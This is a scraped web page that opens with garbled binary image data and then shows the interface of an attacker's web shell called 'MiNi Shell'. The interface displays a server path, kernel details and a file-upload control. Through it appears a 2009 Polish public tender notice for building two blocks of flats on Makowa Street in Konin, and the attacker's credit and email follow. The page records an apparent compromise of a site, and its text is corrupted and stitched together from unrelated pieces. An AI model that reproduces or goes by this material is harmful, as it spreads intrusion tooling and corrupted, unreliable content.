JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/27547-N-2009.html

<p class="kh_header"><b>Konin: Budowa  budynków mieszkalnych wielorodzinnych  nr 5  i 6  przy ulicy Makowej w Koninie</b><br>
<b>Numer ogłoszenia: 27547 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Towarzystwo Budownictwa Społecznego Sp. z o. o. , ul. 3 Maja 21, 62-500 Konin, woj. wielkopolskie, tel. (063) 245 75 41, faks (063) 245 76 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konin.pl/mtbs</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  budynków mieszkalnych wielorodzinnych  nr 5  i 6  przy ulicy Makowej w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Budowa  budynków mieszkalnych wielorodzinnych  nr 5 i 6  przy ulicy Makowej w Koninie 

1.Zakres robót budowlanych związanych z budową  budynków mieszkalnych wielorodzinnych  nr 5 i 6  przy ulicy Makowej w Koninie obejmuje:

1a. Roboty w branży budowlanej:
Budowa budynku mieszkalnego wielorodzinnego z garażami podziemnymi oraz infrastrukturą towarzyszącą.
1b. Roboty w branży sanitarnej:
- wykonanie przyłączy wodociągowych,
- wykonanie przyłączy kanalizacji sanitarnej,
- wykonanie przyłączy kanalizacji deszczowej,
- wykonanie instalacji zimnej wody - z przyłączy wodociągowych, zlokalizowanych w poziomie    garażu, do miejskiej sieci wodociągowej, 
- wykonanie instalacji kanalizacji sanitarnej - odprowadzenie ścieków do miejskiej kanalizacji sanitarnej,
- wykonanie instalacji kanalizacji deszczowej - podłączenie do miejskiej kanalizacji deszczowej,
- wykonanie instalacji ciepłej wody - z węzłów cieplnych zlokalizowanych w poziomie garażu,
- instalacja centralnego ogrzewania - z węzłów cieplnego zlokalizowanych w poziomie piwnic i podłączonych do miejskiej sieci ciepłowniczej,
- wykonanie węzłów cieplnych dwufunkcyjnych zlokalizowanych w bud. nr 5 i 6.

1c.Roboty w branży elektrycznej:
- wykonanie instalacji elektrycznej wewnętrznej
- wykonanie instalacji odgromowej,
- wykonanie instalacji wideodomofonowej,
- wykonanie instalacji wewnętrznej telewizyjnej,
- wykonanie oświetlenia zewnętrznego.
1d. Roboty w branży telekomunikacyjnej - instalacja telefoniczna:
- wykonanie instalacji telefonicznej wewnętrznej.
1e. Roboty w branży systemy alarmowe budynku;
- instalacja systemu przemysłowej telewizji dozorowanej monitorowanej z budynku nr 1.
Pozostałe roboty objęte zakresem zamówienia:
-zadaszenie śmietnika wraz z wykonaniem stalowych drzwi zabezpieczonych zamkiem
-skrzynki pocztowe ( 47 szt.)
-gabloty ogłoszeniowe (4 szt.)
-gablota na klucze (1 szt.)
-kosze na śmieci - 8 szt. 
-uchwyty flagowe (2 szt.)
-uchwyty + sznury w suszarniach
-komplet kluczy dla każdego mieszkania (3szt. do mieszkania, 1 szt. do drzwi wejściowych do piwnicy, 1 szt. do drzwi wejściowych do klatki, klucz do skrzynki pocztowej, klucz do szafki wodomierzowej, klucz do drzwi do śmietnika),
-wyprowadzenie instalacji do podlewania (zewnętrzna szafka z kranem czerpalnym),
-roczna pielęgnacja nasadzonej zieleni,
-montaż tablicy informacyjnej - materiał dostarcza Zamawiający,
-wyłazy na dach powinny być zamykane na kłódkę energetyczną: dołączona powinna być drabinka; mocowanie wyłazu - otwieranie na zawiasach z zabezpieczeniem przed całkowitym otworzeniem,
-wyposażenie jednego pomieszczenia gospodarczego usytuowanego w piwnicy dla gospodarza obiektu (wc kompakt, umywalka, bateria wody zimnej i ciepłej, wodomierze wody zimnej i ciepłej oraz kanalizacja sanitarna do ww.),
-kraty naokienne na klatkach schodowych powinny być zabezpieczone kłódką energetyczną,
-oznakowanie wykonanych miejsc parkingowych odpowiednim znakiem drogowym.

a)Podstawowe dane dotyczące przedmiotu zamówienia :

Budowa obejmuje budynki mieszkalne wielorodzinne z garażami podziemnymi oraz infrastrukturą towarzyszącą.

Wyszczególnienie:

1.Budynek nr 5
powierzchnia zabudowy                    	= 596,2 m2
powierzchnia użytkowa mieszkań  - st. surowy	= 1611,6 m2      
powierzchnia użytkowa budynku - st. surowy 	= 2744,9 m2
powierzchnia całkowita			= 3284,8 m2
kubatura					= 9819,0 m3
ilość kondygnacji naziemnych		= 4
ilość kondygnacji podziemnych		= 1
wysokość kondygnacji naziemnych		= 2,89 m
liczba klatek schodowych			= 3
liczba mieszkań 				= 27
liczba garaży 				= 14

2.Budynek nr 6
powierzchnia zabudowy                               	= 405,9 m2
powierzchnia użytkowa mieszkań  - st. surowy	= 1186,3 m2      
powierzchnia użytkowa budynku - st. surowy 	= 2061,7 m2
powierzchnia całkowita			= 2447,6 m2
kubatura					= 8336,0 m3
ilość kondygnacji naziemnych		= 4
ilość kondygnacji podziemnych		= 1
wysokość kondygnacji naziemnych		= 2,88 m
liczba klatek schodowych			= 1
liczba mieszkań 				= 20
liczba garaży 				= 10


Wyposażenie instalacyjne budynków  nr 5 i 6
-instalacja zimnej wody
-instalacja kanalizacji sanitarnej
-instalacja kanalizacji deszczowej 
-instalacja ciepłej wody
-instalacja centralnego ogrzewania
-instalacja elektryczna wewnętrzna 
-instalacja odgromowa
-instalacja wewnętrzna telewizyjna
-instalacja telefoniczna wewnętrzna
-instalacja wideodomofonowa
-instalacja systemu przemysłowej telewizji dozorowanej monitorowanej 
-węzły cieplne

Przyłącza:
-przyłącza wodociągowe
-przyłącza kanalizacji sanitarnej        
-przyłącza kanalizacji deszczowej      
-oświetlenie terenu
Dokumentacja projektowa znajduje się także do wglądu w siedzibie Miejskiego Towarzystwa Budownictwa Społecznego Sp. z o.o. w Koninie - ul. 3 Maja 21, 62-500 Konin.

Szczegółowy zakres robót do wykonania zawarty jest w dokumentacji projektowej
obejmującej : 

1. projekt budowlany, projekt wykonawczy 
2. przedmiary robót   
3. oraz  specyfikacje techniczne  wykonania i odbioru robót 
                                                                                                       
Przedmiot zamówienia ma być wykonany w oparciu o dokumentację projektową, oraz wizję lokalną w miejscu prowadzenia robót. W razie stwierdzenia przez Wykonawcę, że dokumentacja projektowa zawiera błędy lub braki winien niezwłocznie powiadomić o tym fakcie zamawiającego.  

Szczegółowe warunki dotyczące realizacji zamówienia :

1.Wykonawca na własną odpowiedzialność i na swój koszt, podejmie wszelkie środki zapobiegawcze wymagane przez rzetelną praktykę budowlaną oraz aktualne okoliczności,aby zabezpieczyć prawa właścicieli posesji i budynków sąsiadujących z terenem budowy  i uniknąć powodowania tam jakichkolwiek zakłóceń czy szkód. 

2.Wykonawca zabezpieczy Zamawiającego przed roszczeniami przejmując odpowiedzialność materialną za wszelkie skutki finansowe z tytułu jakichkolwiek roszczeń wniesionych przez właścicieli posesji czy budynków sąsiadujących z terenem budowy w zakresie, w jakim wykonawca odpowiada za takie zakłócenia czy szkody.

Do obowiązków wykonawcy należy dodatkowo ;   

1.Sporządzenia projektu organizacji ruchu drogowego.
2.Obsługi geotechnicznej i geodezyjnej w zakresie wytyczenia  i  inwentaryzacji     geodezyjnej powykonawczej. 
3.Sporządzenia dokumentacji powykonawczej.
4.Uzyskania decyzji zezwalającej na prowadzenie robót w pasie drogowym.
5.Wykonanie inwentaryzacji fotograficznej lub graficznej robót instalacyjnych wykonywanych w pomieszczeniach,
6.Zasilania placu budowy w energię elektryczną , telefon, wodę i sanitariaty .
7.Ubezpieczenia placu budowy, opłaty za zajęcie pasa drogowego wraz     z opracowaniem projektu organizacji ruchu  dla zamknięcia ulicy z ewentualną     reorganizacją ruchu kołowego.
8.Wykonawca robót musi odpowiadać za jakość wykonanych robót oraz za    zgodność    wykonania zamówienia z dokumentacją projektową ,  Specyfikacją Techniczną Wykonania    i Odbioru Robót, zaleceniami nadzoru inwestorskiego, obowiązującymi normami, warunkami    technicznymi  wykonania robót oraz zgodnie ze sztuką  budowlaną.
9.Wykonawca instalacji c.o. i c.w.u. powiadomi MPEC-Konin Sp. z o.o. o gotowości do    wykonania prób (próby ciśnieniowe i próby na ciepło) oraz uzgodni termin ich wykonania przy    współudziale przedstawicieli MPEC.
10.Przed zgłoszeniem przedmiotu umowy do odbioru Wykonawca winien     wykonać    wszystkie niezbędne próby, badania i odbiory z wynikiem pozytywnym .
11. Zapewnienie ochrony budynku do momentu przekazania kluczy pierwszym mieszkańcom.

10.5 Inne istotne informacje

1.Wykonawca ma obowiązek zorganizować i przeprowadzić roboty w sposób bezpieczny,  nie stwarzający zagrożenia dla osób przebywających na terenie inwestycji.

2.Do zakresu robót i obowiązków wykonawcy przedmiotu zamówienia w ramach ceny ryczałtowej wchodzić również będzie ;

a) organizacja i zagospodarowanie placu budowy wraz z zapleczem budowy,
b) zabezpieczenie terenu przed dostępem osób trzecich,
c) utrzymywanie porządku w trakcie prowadzenia robót oraz uporządkowanie po
zakończeniu robót,
d)utrzymywanie w czystości kół pojazdów wyjeżdżających z placu budowy na ulice,
e)natychmiastowe docelowe i skuteczne usuniecie wszelkich szkód i awarii
spowodowanych przez wykonawcę w trakcie realizacji robót,
f)opracowanie i przekazanie zamawiającemu dokumentacji powykonawczej 
 i odbiorowej,
g)czynny udział w odbiorach przez służby zewnętrzne.

3.Wykonawca ma obowiązek unieszkodliwienia powstałych odpadów, jako wytwórca tych odpadów w rozumieniu art. 3 ust. 3 pkt. 22 ustawy o odpadach (Dz.U. Nr 62, poz. 628 z późniejszymi zmianami). Wykonawca ma obowiązek uwzględnić koszt składowania, wywozu i utylizacji odpadów w cenie ryczałtowej.

4.Wykonawca udzieli  gwarancji : minimum 6 lat  na wykonane roboty budowlane w zakresie elementów konstrukcyjnych budynku, ścian zewnętrznych wewnętrznych, stropów i konstrukcji dachu zgodnie z załącznikiem nr 9 - karta gwarancyjna.

5.Wykonawca (w przypadku wygrania przetargu ) zobowiązany jest do opracowania i przedłożenia zamawiającemu najpóźniej w dniu podpisania umowy szczegółowego harmonogramu rzeczowo- finansowego dla całego okresu trwania inwestycji, z podziałem  na miesiące realizacji. Harmonogram opracowany będzie na podstawie tabeli zestawienie kosztów zamówienia  z uwzględnieniem w nim miesięcznego zaawansowania prac w poszczególnych elementach jak i ich wartości. Zatwierdzony przez inspektora nadzoru harmonogram będzie stanowić załącznik do umowy.

6.Po zakończeniu robót budowlanych Wykonawca uzyska w imieniu Zamawiającego prawomocną decyzję o pozwoleniu na użytkowanie obiektu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.10.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane w postepowaniu wadium 40.000,- zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają  następujące  warunki tj:
1.Posiadają  uprawnienia do wykonywania  czynności  objętej   przedmiotem 
zamówienia, jeżeli ustawy nakładają obowiązek  posiadania takich uprawnień,

2.Posiadają niezbędną wiedzę i doświadczenie w wykonawstwie podobnych robót, wyrażające się wybudowaniem   w ciągu ostatnich 5 lat przed  dniem wszczęcia  postępowania  o udzielenie zamówienia , a jeżeli  okres prowadzenia działalności  jest  krótszy -  w tym okresie co najmniej jednego budynku mieszkalnego wielorodzinnego lub budynku użyteczności publicznej o powierzchni użytkowej minimum 4.000,00 m2 każdy i o wartości nie mniejszej niż 10.000.000,00 zł,-(brutto). 
Przez budynek użyteczności publicznej Zamawiający rozumie budynek przeznaczony dla administracji publicznej, wymiaru sprawiedliwości , kultury, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej , opieki społecznej i socjalnej, budynek biurowy, socjalny oraz inny budynek ogólnodostępny przeznaczony do wykonywania podobnych funkcji.
 
W przypadku składania oferty wspólnej warunek zostanie uznany przez Zamawiającego jako spełniony, jeżeli co najmniej jeden z Wykonawców składających ofertę wspólną będzie spełniać ww warunek. 

3. Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne
zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
zamówienia, tj.
a)kierownikiem budowy w branży budowlanej, który winien posiadać:
-uprawnienia budowlane do kierowania robotami budowlanymi, w specjalności konstrukcyjno - budowlanej  bez ograniczeń
-doświadczenie w pełnieniu funkcji kierownika budowy na minimum 3 budowach lub budynków mieszkalnych lub budynków użyteczności publicznej 
b)kierownikami robót w branży sanitarnej i elektrycznej posiadającymi:
- uprawnienia budowlane do kierowania robotami budowlanymi, w specjalności:
* instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych 
  i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych bez ograniczeń 
  (min. 1 osoba),
* instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych  bez ograniczeń (min. 1 osoba),
* doświadczenie w pełnieniu funkcji kierownika robót na minimum 3 budowach,

Kierownicy robót (wyszczególnionych  branż)  muszą być  wpisani na listę   członków  właściwej  izby samorządu   zawodowego na podstawie ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001r., Nr 5, poz.42 z poźn. zm.).

W przypadku składania oferty wspólnej warunek zostanie uznany przez zamawiającego za   spełniony , jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie. 


4.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj: wykażą ,że:
-uzyskali przychód za każdy rok obrotowy  w  latach  2005-2007  a jeżeli okres  prowadzenia jest krótszy - za ten okres,  w wysokości minimum 3.000.000 zł  ( na  podstawie rachunku zysku  i strat - pozycja :przychód netto ze  sprzedaży 
 produktów i zrównane z nimi ) 

-dysponują środkami lub zdolnością kredytową nie mniejszą niż 1.000.000,00 zł.


-posiadają  ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności  gospodarczej na kwotę minimum 200.000 zł 
W przypadku składania oferty wspólnej warunek zostanie uznany przez zamawiającego za  spełniony , jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie. 

5.Spełniają warunki określone w art.22 ust.1,pkt 1-3 ustawy pzp
6.Nie  podlegają  wykluczeniu na podstawie art.24  ust.1 i 2  ustawy pzp.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej , jeżeli  odrębne przepisy wymagają wpisu do  rejestru lub  zgłoszenia  do ewidencji  działalności gospodarczej - wystawione nie  wcześniej  niż 6 m-cy przed upływem  terminu  składania  ofert. 
W przypadku  składania oferty wspólnej ww. dokument składa każdy z wykonawców  składających  ofertę wspólną.

2.Oświadczenie, o spełnieniu warunków zawartych w art. 22 ust. 1  pkt.1-3   ustawy .
W przypadku składania oferty wspólnej  ww. oświadczenie składa pełnomocnik konsorcjum  w imieniu wszystkich jego członków. 

3.Oświadczenie o nie podleganiu  wykluczeniu  z postępowania na  podstawie art.24  ust. 1 i 2 ustawy 
W przypadku składania oferty wspólnej   ww. oświadczenie  składa każdy z wykonawców składających  ofertę wspólną.

4. Wykaz wybudowanego-ych   w ciągu ostatnich 5 lat  przed  dniem wszczęcia  postępowania  o udzielenie zamówienia , a jeżeli  okres prowadzenia działalności  jest  krótszy -  w tym okresie   co najmniej jednego budynku mieszkalnego wielorodzinnego lub budynku użyteczności publicznej   o powierzchni użytkowej minimum 4.000,00 m2 każdy i o wartości nie mniejszej niż 10.000.000,00 zł, + dokumenty potwierdzające ich należyte wykonanie .

W przypadku składania oferty wspólnej  wykonawcy składający  ofertę wspólną  składają wspólny ww. wykaz . 

5.Dokumenty potwierdzające ,że wykonawca dysponuje  osobami zdolnymi do wykonania zamówienia : 
-wykaz  osób, którymi dysponuje lub będzie dysponował  wykonawca  i które będą uczestniczyć  w wykonywaniu zamówienia  , wraz z   informacjami  na temat ich kwalifikacji zawodowych, doświadczenia  niezbędnych do wykonania zamówienia,  a także zakresu  wykonywanych przez nie czynności.      
Pisemne zobowiązanie innych podmiotów  do udostępnienia osób  zdolnych 
do wykonania zamówienia , jeżeli w wykazie o którym mowa wyżej  wykonawca 
wykazał osoby , którymi będzie dysponował. 
-uprawnienia budowlane do kierowania  robotami budowlanymi  w wymaganych specjalnościach, 
-aktualne zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego, dla kierowników robót wyszczególnionych  specjalności.
W przypadku składania oferty wspólnej  wykonawcy składający  ofertę wspólną  składają wspólny ww. wykaz. 

6. Dokumenty na okoliczność potwierdzenia ,że wykonawca znajduje się w sytuacji ekonomicznej i  finansowej  zapewniającej wykonanie zamówienia :
-informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej , w którym wykonawca posiada rachunek , potwierdzająca  wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy  - wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert.
-polisa, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności na wymaganą w postępowaniu kwotę.
  
W przypadku składania oferty wspólnej   ww. dokumenty składa każdy z wykonawców składających ofertę wspólną..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.konin.pl/mtbs.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację  istotnych warunków zamówienia ( cena 268,40 zł )można odebrać w siedzibie Miejskiego TBS Sp. z o.o. przy ul.3 Maja 21, 62-500 Konin  lub za zaliczeniem pocztowym do dnia 18.02.2009 r..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 10:00, miejsce: Oferty należy składać sekretariacie  
Miejskiego TBS Sp. z o.o.w Koninie- ul.3 Maja 21 ,62-500 Konin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com